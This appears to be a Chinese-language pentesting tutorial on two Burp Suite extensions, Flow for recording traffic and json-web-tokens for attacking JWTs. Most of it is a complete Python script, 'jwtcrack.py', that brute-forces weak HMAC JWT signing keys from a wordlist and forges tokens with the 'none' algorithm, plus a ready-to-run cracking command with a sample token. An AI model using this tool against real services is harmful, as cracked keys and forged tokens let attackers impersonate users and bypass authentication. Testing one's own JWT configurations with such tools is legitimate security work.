1.Flow(流量记录)

https://github.com/portswigger/flow
image.png
可以记录下发送的流量,请求包和返回包
image.png

2.json-web-tokens(攻击JWT,伪造签名)

https://github.com/portswigger/json-web-tokens
image.png
若请求包中包含jwt签名编码的,会自动识别
image.png
自动解密
image.png
如果jwt签名使用了弱密钥,则可以进行爆破(前提是HS类型)
爆破脚本
需要安装依赖库py -3 -m pip install pyjwt

  1. import jwt
  2. import json
  3. from optparse import OptionParser 
  6. def runblasting(path,jwt_str,alg):
  7.     if alg == "none":
  8.         alg = "HS256"
  9.     with open(path,encoding='utf-8') as f:
  10.         for line in f:
  11.             key_ = line.strip()
  12.             try:
  13.                 jwt.decode(jwt_str,verify=True,key=key_,algorithm=alg)
  14.                 print('found key! --> ' +  key_)
  15.                 break
  16.             except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
  17.                 print('found key! --> ' +  key_)
  18.                 break
  19.             except(jwt.exceptions.InvalidSignatureError):
  20.                 continue
  21.         else:
  22.             print("key not found!")
  24. def generatejwt(dictstring,key='',alg='none'):
  25.     jsstr = json.loads(dictstring)
  26.     return jwt.encode(jsstr, key=key, algorithm=alg).decode('utf-8')
  28. if __name__ == "__main__":
  29.     parser = OptionParser() 
  30.     parser.add_option("-m", "--mode", action="store", dest="mode", default='',type="string",help="Mode has generate disable encryption and blasting encryption key [generate/blasting]")
  31.     parser.add_option("-s", "--string", action="store", dest="jwtstring", default='',type="string",help="Input your JWT string")
  32.     parser.add_option("-a", "--algorithm", action="store", dest="algorithm", default='none',type="string",help="Input JWT algorithm default:NONE")
  33.     parser.add_option("--kf", "--key-file", action="store", dest="keyfile", type="string", default=False, help="Input your Verify Key File")
  34.     (options, args) = parser.parse_args()
  35.     if options.mode == "generate":
  36.         print(generatejwt(options.jwtstring,alg=options.algorithm))
  37.         exit()
  38.     if options.mode == "blasting":
  39.         runblasting(options.keyfile,options.jwtstring,options.algorithm)
  40.         exit()
  41.     else:
  42.         print(
  43.         '''
  44.       _____  ____      ____  _________    ______  _______          _        ______  ___  ____   
  45.      |_   _||_  _|    |_  _||  _   _  | .' ___  ||_   __ \        / \     .' ___  ||_  ||_  _|  
  46.        | |    \ \  /\  / /  |_/ | | \_|/ .'   \_|  | |__) |      / _ \   / .'   \_|  | |_/ /    
  47.    _   | |     \ \/  \/ /       | |    | |         |  __ /      / ___ \  | |         |  __'.    
  48.   | |__' |      \  /\  /       _| |_   \ `.___.'\ _| |  \ \_  _/ /   \ \_\ `.___.'\ _| |  \ \_  
  49.   `.____.'       \/  \/       |_____|   `.____ .'|____| |___||____| |____|`.____ .'|____||____| 
  50.                                                                                     By:Ch1ng
  51.         '''
  52.         )
  53.         print(parser.format_help())

弱密钥爆破,HS型

  1. py -3 jwtcrack.py -m blasting -s eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1NzYxMjE1NDcsInVzZXJuYW1lIjoiemRqIiwicGFzc3dvcmQiOiIxMjMifQ.mkCLR5Kje9x-z8hRgWBMxnQm8hknOwV1Zd8uSZa3rQY  --kf
  2.  top6000.txt

image.png
image.png